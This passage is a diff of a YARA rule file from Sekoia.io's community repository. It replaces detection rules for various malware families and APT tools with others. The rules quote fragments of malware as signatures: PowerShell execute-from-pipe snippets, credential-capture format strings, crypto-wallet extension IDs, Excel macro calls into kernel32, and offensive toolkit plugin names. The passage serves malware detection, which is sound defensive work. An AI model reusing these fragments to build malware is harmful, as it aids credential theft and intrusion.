-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 400KB and all of them
 }
-rule SEKOIA_Apt_Blackwood_Nspx30_Plugin : FILE
+rule SEKOIA_Apt_Cerana_Keeper_Yk0130 : FILE
 {
 	meta:
-		description = "Detects plugins of NSPX30 backdoor based on RTTI and rundll32 string"
+		description = "Detects YK0130 reverse shell"
 		author = "Sekoia.io"
-		id = "ef8e0d51-c78c-426b-8008-910e27546f23"
-		date = "2024-01-29"
+		id = "3da898a9-68e7-472f-8478-a0243840ec0a"
+		date = "2024-10-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_blackwood_nspx30_plugin.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cerana_keeper_yk0130.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "cf7c232a5a817ff5c0da04744abf99ed2fcea587e3e6f6e8bf3aef7ca8f2b51b"
+		hash = "2554e4864294dc96a5b4548dd42c7189"
+		logic_hash = "4462c6b7f46520207f49275292a3be873540becb593176d771d3489fba6f4cb0"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {2E 3F 41 56 43 43 61 62 69 6E 65 74 40 40}
-		$s2 = {2E 3F 41 56 43 45 6E 63 6F 64 65 72 40 40}
-		$s3 = "rundll32.exe \"%hs\",#1" wide
+		$pdb = "C:\\Users\\admin\\source\\repos\\YK0130" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 300KB
 }
-rule SEKOIA_Malware_Valleyrat_Downloader_Strings : FILE
+rule SEKOIA_Infostealer_Win_Grmsk_Strings : FILE
 {
 	meta:
-		description = "Detects ValleyRat downloader"
+		description = "Finds GrMsk samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "12985f34-f894-402b-80d1-5d6b2486d730"
-		date = "2024-06-11"
+		id = "58f32339-5e0f-405c-9acc-14b93f6c208b"
+		date = "2023-11-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_valleyrat_downloader_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_grmsk_strings.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "321683ac5bdec626cf140cb50507fb03aea2a32635eb6cec884a3fa43c1a9d91"
+		logic_hash = "a2f638556edf5b2cabcd67e7d29a9e3f554b707af688f79b89f2f67d493093b3"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 43 00 3a 00 5c [0-30]
-        5c 00 4e 00 54 00 55
-        00 53 00 45 00 52 00
-        2e 00 44 00 58 }
+		$str01 = "ref.txt" ascii fullword
+		$str02 = "--------" ascii fullword
+		$str03 = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.834.0 Mobile Safari/5362" ascii fullword
+		$str04 = "POST" ascii fullword
+		$str05 = "\\SearchWallet\\" ascii
+		$str06 = "1234niwef" ascii
+		$str07 = "afbcbjpbpfadlkmhmclhkeeodmamcflc" ascii
+		$str08 = "lodccjjbdhfakaekdiahmedfbieldgik" ascii
+		$str09 = "wallets" ascii
+		$str10 = "config" ascii
+		$str11 = "\"recently_open\": [" ascii
+		$str12 = "\"gui_last_wallet\": " ascii
+		$str13 = "YUOhtyugjKgdfgjFGghj676jj" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 2MB and all of them
+		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
 }
-rule SEKOIA_Tool_3Proxy_Strings : FILE
+rule SEKOIA_Apt_Apt37_Malicious_Hta_File : FILE
 {
 	meta:
-		description = "Detects 3proxy based on strings"
+		description = "Detects malicious APT37 files"
 		author = "Sekoia.io"
-		id = "daf6cd97-8033-4bfd-88b5-41c06eb417b0"
-		date = "2024-03-14"
+		id = "22a98c27-8ff4-4760-b505-f8eacf4dabda"
+		date = "2023-03-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_3proxy_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt37_malicious_hta_file.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f1d9bea9975af9bfa3f1a8cbf2c1d65fe1d39f303d5dbe6131887653cbbe7021"
+		logic_hash = "85289bea86641ea9c359c361d075783449d453017485170abc87c47872792210"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247333,24 +247320,28 @@ rule SEKOIA_Tool_3Proxy_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "of 3proxy-"
-		$ = "-pPORT - service port to accept connections"
+		$s1 = "<HTML>" nocase
+		$s2 = " UwB0AGEAcgB0AC0AUwBs" ascii
+		$s3 = "= new ActiveXObject(" ascii
+		$s4 = "\", \"\", \"open\", 0);" ascii
+		$s5 = ".moveTo(" ascii
+		$s6 = "self.close();"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 500KB and all of them
+		$s1 at 0 and all of them and filesize < 1MB
 }
-rule SEKOIA_Hacktool_Sharpview_Strings : FILE
+rule SEKOIA_Tool_Runpeinmemory_Strings : FILE
 {
 	meta:
-		description = "Detects SharpView based on strings."
+		description = "Detects standard implementation of RunPEInMemory"
 		author = "Sekoia.io"
-		id = "585ead98-36d0-402c-b527-4dec308cb1c9"
-		date = "2022-02-14"
+		id = "64129ab0-b599-4760-ab21-20c475c2c07f"
+		date = "2024-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_sharpview_strings.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_runpeinmemory_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "762e8d292e052cb0922743c2f5b14170e91fe440e05331892b20b5921e0559da"
+		logic_hash = "154f3db98f8ee902ec7b58812525dbbef837ae30279c40b8d95ec93ae1260a69"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247358,28 +247349,25 @@ rule SEKOIA_Hacktool_Sharpview_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Args_Get_DomainGPOComputerLocalGroupMapping"
-		$ = "Args_Get_ForestGlobalCatalog"
-		$ = "Args_Find_DomainLocalGroupMember"
-		$ = "Args_Get_DomainFileServer"
-		$ = "Ex: SharpView.exe Method-Name" wide
-		$ = "[Get-PathAcl] error: {0}" wide
+		$ = "[+] Fix Import Address Table"
+		$ = "[+] Relocation Fixed."
+		$ = "[+] File %s isn't a PE file."
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 800KB and 5 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Subtle_Paws : FILE
+rule SEKOIA_Apt_Agent_Racoon_Strings : FILE
 {
 	meta:
-		description = "SUBTLE-PAWS powershell backdoor used by Gamaredon"
+		description = "Detects Agent Racoon used by CL-STA-0002"
 		author = "Sekoia.io"
-		id = "1950f886-97d2-4aa1-8f13-2947eba706e4"
-		date = "2024-02-09"
+		id = "ec89f1db-0ba8-48c8-8c1a-c38c410f3e39"
+		date = "2023-12-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_subtle_paws.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_agent_racoon_strings.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "2fcebcf3401912e06ca4a34bf4e8d5318c6b2e08b00c4939ab932f3fb94cbc89"
+		logic_hash = "4e32606edffab0907e343ab2fef8642c0064d83c2933531619f9dee8957d2fe4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247387,83 +247375,178 @@ rule SEKOIA_Apt_Gamaredon_Subtle_Paws : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "$splitter" ascii wide
-		$s2 = "[System.Convert]::FromBase64String" ascii wide
-		$s3 = "$_;$var2 =\"var1\";$var3" ascii wide
-		$s4 = "foreach-object{$_|powershell -noprofile -}" ascii wide
+		$ = "Command failed:" wide
+		$ = "Not uploaded:" wide
+		$ = "Not downloaded:" wide
+		$ = "xn--cc" wide
+		$ = "xn--ac" wide
+		$ = "xn--bc" wide
+		$ = "cmd.exe" wide
+		$ = ".xn--" wide
 
 	condition:
-		$s1 and $s2 and ( $s3 or $s4 ) and filesize < 100KB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Emmenhtal_Strings_Hta_Exe : FILE
+
+rule SEKOIA_Apt_Mustang_Panda_Toneshell : FILE
 {
 	meta:
-		description = "Emmenhtal Loader string"
+		description = "Detect the TONESHELL implant used by Mustang Panda from specific functions"
 		author = "Sekoia.io"
-		id = "64e08610-e8a4-4edd-8f6b-d4e8d2b47d87"
-		date = "2024-09-06"
+		id = "bf7c68a9-dddc-494a-a603-c2311ed712a4"
+		date = "2022-11-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/emmenhtal_strings_hta_exe.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustang_panda_toneshell.yar#L4-L160"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "e86a22f1c73b85678e64341427c7193ba65903f3c0f29af2e65d7c56d833d912"
-		logic_hash = "93f85a4ccb58c6aeb664c4c843ff80a4ab7b4308a944537f7ebe087515a61659"
+		logic_hash = "192fb01817cc6361062999cf539c51616d1755a5cd8e9d6e37bee6f6d04b0721"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$char = / = String\.fromCharCode\([a-zA-Z]{2,4},[a-zA-Z]{2,4},/
-		$var = "var "
-		$eval = "eval("
-		$script1 = "<script>"
-		$script2 = "</script>MZ"
+		$func1 = {
+        55
+        89 E5
+        64 A1 18 00 00 00
+        A3 ?? ?? ?? ??
+        5D
+        C3
+        }
+		$func2 = {
+        55
+        89 E5
+        50
+        8B 45 ??
+        8B 45 ??
+        8B 45 ??
+        8B 45 ??
+        89 45 ??
+        8B 45 ??
+        89 C1
+        83 C1 FF
+        89 4D ??
+        83 F8 00
+        0F 84 ?? ?? ?? ??
+        8B 45 ??
+        8A 08
+        8B 45 ??
+        88 08
+        8B 45 ??
+        83 C0 01
+        89 45 ??
+        8B 45 ??
+        83 C0 01
+        89 45 ??
+        E9 ?? ?? ?? ??
+        8B 45 ??
+        83 C4 04
+        5D
+        C3
+        }
+		$decryption_routine1 = {
+        8B 45 ??
+        C7 45 ?? 00 00 00 00
+        83 7D ?? 20
+        0F 8D ?? ?? ?? ??
+        8B 45 ??
+        8B 4D ??
+        0F BE 04 08
+        83 F0 ??
+        88 C2
+        8B 45 ??
+        8B 4D ??
+        88 14 08
+        8B 45 ??
+        83 C0 01
+        89 45 ??
+        E9 ?? ?? ?? ??
+        83 C4 04
+        }
+		$decryption_routine2 = {
+        55
+        89 E5
+        83 EC 08
+        8B 45 ??
+        8B 45 ??
+        8B 45 ??
+        8B 45 ??
+        C7 45 ?? 00 00 00 00
+        C7 45 ?? 00 00 00 00
+        8B 45 ??
+        3B 45 ??
+        0F 8D ?? ?? ?? ??
+        8B 45 ??
+        8B 4D ??
+        0F BE 04 08
+        8B 4D ??
+        8B 55 ??
+        0F BE 0C 11
+        31 C8
+        88 C2
+        8B 45 ??
+        8B 4D ??
+        88 14 08
+        8B 45 ??
+        8B 4D ??
+        83 E9 01
+        39 C8
+        0F 85 ?? ?? ?? ??
+        C7 45 ?? 00 00 00 00
+        E9 ?? ?? ?? ??
+        8B 45 ??
+        83 C0 01
+        89 45 ??
+        8B 45 ??
+        83 C0 01
+        89 45 ??
+        E9 ?? ?? ?? ??
+        83 C4 08
+        5D
+        C3
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and $var in ( @script1 .. @script1 + 2000 ) and $char in ( @var .. @var + 100 )
+		uint16be( 0 ) == 0x4d5a and filesize < 8MB and for all i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) != "69f400d3ff4679294e63fb8a8ca97dbb" ) and 3 of them and true
 }
-rule SEKOIA_Implant_Any_Sliver : FILE
+
+rule SEKOIA_Implant_Win_Graphiron_Downloader : FILE
 {
 	meta:
-		description = "Rule which detects any Sliver implant PE/Dlls/ELFs/MAC-O."
+		description = "Detect the downloader of Graphiron"
 		author = "Sekoia.io"
-		id = "4b16f28a-2048-4044-8620-8e7a1651f2b1"
-		date = "2021-11-08"
+		id = "c50c4bd2-3828-43bf-b45c-8e911c298536"
+		date = "2023-02-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_any_sliver.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_graphiron_downloader.yar#L4-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c7a2790fd13de0476cfe16ef26b2d4c8775f4f453d076c78975e2c372f03322c"
+		logic_hash = "f0aa0541cbf3f93ee136cf3235a4935f1c0588b5cdb21203abee9f61baf3f4f2"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.1"
+		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$s1 = ").GetActiveC2" ascii
-		$s2 = ").GetVersion" ascii
-		$s3 = ").GetReconnectInterval" ascii
-		$s4 = ").GetProxyURL" ascii
-		$s5 = ").GetPollInterval" ascii
+		hash1 = "0d0a675516f1ff9247f74df31e90f06b0fea160953e5e3bada5d1c8304cfbe63"
+		hash2 = "878450da2e44f5c89ce1af91479b9a9491fe45211fee312354dfe69e967622db"
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and ( true and filesize < 11MB and filesize > 7MB ) and ( all of ( $s* ) )
+		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1b614f8d813125f56d2e772ed0ca5dae" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5c6496d33de5a35bd38ddb12d8b42e03" ) and filesize > 3MB and filesize < 6MB
 }
-rule SEKOIA_Tool_Pivotnacci_Webshell : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_11 : FILE
 {
 	meta:
-		description = "Detects pivotnacci webshell"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "729b6381-b59d-46fe-9ad4-b8b68fb0ceea"
-		date = "2024-04-22"
+		id = "703d2eb2-c9fd-4891-ba95-f94a8313618e"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_pivotnacci_webshell.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_11.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a57792915b4c888547ebe0b08b928e4bc32b3526c98a3ccc9fca0193cedee20a"
+		logic_hash = "00c0dcc244db608d3a0d7500cdebadcc69ba0d56091a0a1fd7d58c27d255861f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247471,100 +247554,84 @@ rule SEKOIA_Tool_Pivotnacci_Webshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "if (cmd == SEND_OPERATION) {"
-		$ = "Response.BinaryWrite(newBuff)"
-		$ = "Request.Headers.Get(ID_HEADER)"
-		$ = "[$READ_BUFFER_SESSION_KEY . $connection_id]"
-		$ = "extract_session_readbuf($conn_id"
-		$ = "Failed connecting to target $addr:$port : $errstr"
-		$ = "void handle_post(String cmd)"
-		$ = "SocketChannel socketChannel = this.get_socket(socket_id"
-		$ = "this.get_svc().compareTo(this.get_hostname())"
+		$ = "decodeHex = EL.NodeTypedValue"
+		$ = "Private Function decodeHex(hex)"
+		$ = "serialized_obj = serialized_obj & "
+		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
 
 	condition:
-		3 of them and filesize < 10KB
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Downloader_Win_Newsterminal : FILE
+rule SEKOIA_Infostealer_Win_Mars_Stealer_Xor_Routine : FILE
 {
 	meta:
-		description = "Detect the PowerShell based downloader used by APT42 called NEWSTERMINAL"
+		description = "Detect Mars Stealer based on a specific XOR routine"
 		author = "Sekoia.io"
-		id = "2f9aae45-e3bd-4d87-b336-5d141738952b"
-		date = "2024-08-26"
+		id = "3e2c7440b2fc9e4b039e6fa8152ac8ff"
+		date = "2022-04-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_newsterminal.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_mars_stealer_xor_routine.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "2b756515400d7e3b6e21ee3a83f313c8"
-		logic_hash = "45c6c2b5b3723bf3ed46c82e6a254547d8c8b3446bb2fa4b4f0fc8441731ae7e"
+		logic_hash = "c7e65550a225431552e8a81bbce81dd66350021b6444c94fe7a37aa96712e9b1"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Start-Process -FilePath $takeownCommand -ArgumentList $takeownArgs -Wait -NoNewWindow"
-		$ = "function Download-And-Extract-Dll {"
-		$ = {24 69 63 61 63 6C 73 41 72 67 73 20 3D 20 24 64 65 73 74 69 6E 61 74 69 6F 6E 46 69 6C 65 50 61 74 68 2C 20 22 2F 67 72 61 6E 74 22 2C 20 22 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 73 3A 46 22 2C 20 22 2F 63 22 2C 20 22 2F 71 22}
-		$ = "$publicip=(iwr http://127.0.0.1:4040/api/tunnels"
+		$xor = {8b 4d ?? 03 4d ?? 0f be 19 8b 55 ?? 52 e8 ?? ?? ?? ?? 83 c4 ?? 8b c8 8b 45 ?? 33 d2 f7 f1 8b 45 ?? 0f be 0c 10 33 d9 8b 55 ?? 03 55 ?? 88 1a eb be}
 
 	condition:
-		1 of them and filesize < 30KB
+		uint16( 0 ) == 0x5A4D and $xor
 }
-rule SEKOIA_Backdoor_Win_Volgmer : FILE
+rule SEKOIA_Apt_Buhtrap_Maldocx
 {
 	meta:
-		description = "Detect the NukeSped variant called Volgmer used by Andariel"
+		description = "Detect the malicious DOCX used by Buhtrap"
 		author = "Sekoia.io"
-		id = "9468a66d-787c-488f-937b-22617c7a2ded"
-		date = "2023-09-04"
+		id = "4aaba2f1-fafd-4e3f-8b18-7beda11464d1"
+		date = "2022-02-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_volgmer.yar#L1-L32"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_buhtrap_maldocx.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "700fcfcc3df1d81af99db38e305f64ca87f8368fc0149c9ad64d75c2917ec1f3"
+		logic_hash = "69968fa6836a71cd835f40c5168d197d3b5fc13b62791279f48a6bdeb4709bd5"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "3098e6e7ae23b3b8637677da7bfc0ba720e557e6df71fa54a8ef1579b6746061"
-		hash2 = "7339cfa5a67f5a4261c18839ef971d7f96eaf60a46190cab590b439c71c4742b"
-		hash3 = "8daa6b20caf4bf384cc7912a73f243ce6e2f07a5cb3b3e95303db931c3fe339f"
-		hash4 = "1b88b939e5ec186b2d19aec8f17792d493d74dd6ab3d5a6ddc42bfe78b01aff1"
 
 	strings:
-		$ = "Fixed" wide
-		$ = "CDRom" wide
-		$ = "Removable" wide
-		$ = "%.2fGB" wide
-		$ = "\\*.*" wide
-		$ = "Folder" wide
-		$ = "%.1fKB" wide
-		$ = "%.1fMB" wide
-		$ = "%s\\*.*" wide
-		$ = "%s\\%s\\%s" wide
-		$ = "%s\\%s%s" wide
-		$ = "Remote PC" wide
-		$ = "%s|%s|%s|%s|%s|%s|" wide
-		$ = "%s\\cmd.exe" wide
+		$ = "<xm:macrosheet xmlns=" ascii fullword
+		$ = "CALL(\"kernel32\",\"VirtualFree"
+		$ = "CALL(\"kernel32\",\"CreateFileA"
+		$ = "CALL(\"kernel32\",\"WriteFile"
+		$ = "CALL(\"kernel32\",\"VirtualAlloc"
+		$ = "CALL(\"kernel32\",\"WinExec"
+		$ = "CALL(\"kernel32\",\"lstrcatA"
+		$ = "CALL(\"kernel32\",\"CreateFileA"
+		$ = "CALL(\"kernel32\",\"VirtualFree"
+		$ = "CALL(\"kernel32\",\"ExpandEnvironmentStringsA"
+		$ = "CALL(\"kernel32\",\"CloseHandle"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		all of them
 }
-rule SEKOIA_Loader_Amadey_Standalone_May23 : FILE
+rule SEKOIA_Apt_Emberbear_Credpump_Strings : FILE
 {
 	meta:
-		description = "Finds standalone samples of Amadey based on characteristic strings"
+		description = "Detects CredPump backdoor"
 		author = "Sekoia.io"
-		id = "5013586c-5ac3-4c1a-a82e-edce4889eedc"
-		date = "2023-05-17"
+		id = "c9898e34-4ab8-49d6-9c8a-3fce592449e2"
+		date = "2023-02-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_amadey_standalone_may23.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_emberbear_credpump_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "40d2d7a52066ca4e1a65c82ebfa882a77616a1c68f1d315946ab14467787d468"
+		logic_hash = "6f2c96fe3f314221626b4c053658af0e7231f151886f10eb1d69e07ea3e5c634"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247572,50 +247639,90 @@ rule SEKOIA_Loader_Amadey_Standalone_May23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "\\Amadey\\Release\\Amadey.pdb" ascii
-		$hex01 = { 6E 74 64 6C 6C 2E 64 6C  6C 00 00 00 72 75 6E 61 73 }
+		$ = "User=%s Pass=%s Host=%s"
+		$ = "/etc/rc0.d/.rc0.d"
+		$ = "pam_get_authtok"
+		$ = "Password:"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 200KB and all of them
 }
-rule SEKOIA_Apt_Unk_Batcopier_Strings : FILE
+rule SEKOIA_Malware_Win_Mex : FILE
 {
 	meta:
-		description = "Detects BatCopier variant"
+		description = "Detect the MEX malware"
 		author = "Sekoia.io"
-		id = "eb76bbd0-a722-4fec-a4a7-c48c70a1880b"
-		date = "2024-09-06"
+		id = "57fe8525-4bab-4078-ac6f-635f0f7963ec"
+		date = "2022-07-28"
 		modified = "2024-12-19"
-		reference = "https://www.seqrite.com/blog/operation-oxidovy-sophisticated-malware-campaign-targets-czech-officials-using-nato-themed-decoys/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unk_batcopier_strings.yar#L1-L18"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_win_mex.yar#L1-L57"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0007d6d00d5b8db048456bb566ef9ed4516c4e1b392cc73c40396785ba885f55"
+		logic_hash = "1335a212d1af0087cd0e0402f3d6c864d1aafd3df3f1e4bb3851c96c3ff403cb"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "@echo off"
-		$ = "echo F|xcopy"
-		$ = "attrib +r +s +h"
+		$ = "MEX: In-memory execution of offensive tradecraft (Version:" wide
+		$ = "Available Options:" wide
+		$ = "-meh <help>" wide
+		$ = "-mep <payload_name_to_use>" wide
+		$ = "-mec <payload_args>" wide
+		$ = "Execution examples:" wide
+		$ = "mex.exe -mep sharphound" wide
+		$ = "mex.exe -mep sharphound -mec -arg1" wide
+		$ = "mex.exe -mep get_version" wide
+		$ = "mex.exe -mep list_plugins" wide
+		$ = "Available plugins:" wide
+		$ = "Payload to execute:" wide
+		$ = "No payload arguments were provided" wide
+		$ = "Payload arguments:" wide
+		$ = "MEX - About to execute payload %s with command line arguments: %s" wide
+		$ = "MEX - About to execute payload %s with no command line arguments" wide
+		$ = "Execution of payload %s just finished. Quitting now." wide
+		$ = "There was a problem executing payload %s. Quitting now." wide
+		$ = "chisel" wide
+		$ = "enum_script" wide
+		$ = "eop_script" wide
+		$ = "mexecatz" wide
+		$ = "scshell" wide
+		$ = "shares_script" wide
+		$ = "internalmonologue" wide
+		$ = "inveigh" wide
+		$ = "pingcastle" wide
+		$ = "rubeus" wide
+		$ = "seatbelt" wide
+		$ = "sharpexec" wide
+		$ = "sharphound3" wide
+		$ = "spoolsample" wide
+		$ = "standin" wide
+		$ = "grouper2" wide
+		$ = "lockless" wide
+		$ = "sharpoxidresolver" wide
+		$ = "sharpprinter" wide
+		$ = "list_plugins" wide
+		$ = "get_version" wide
+		$ = "Current version is %s" wide
+		$ = "Supported plugins:" wide
 
 	condition:
-		all of them and filesize < 1KB
+		uint16( 0 ) == 0x5A4D and filesize > 10MB and 15 of them
 }
-rule SEKOIA_Apt_Scanbox_Framework_Not_Obfuscated : FILE
+rule SEKOIA_Bot_Lin_Zerobot_Dec22 : FILE
 {
 	meta:
-		description = "Detects the non obfuscated version of ScanBox"
+		description = "Detect the linux Zerobot implant using specific strings"
 		author = "Sekoia.io"
-		id = "4790f122-89de-4f7b-a25f-9ac7b1af8333"
-		date = "2022-09-01"
+		id = "ce028297-a526-4a6a-95db-8762fb5895f6"
+		date = "2022-08-05"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
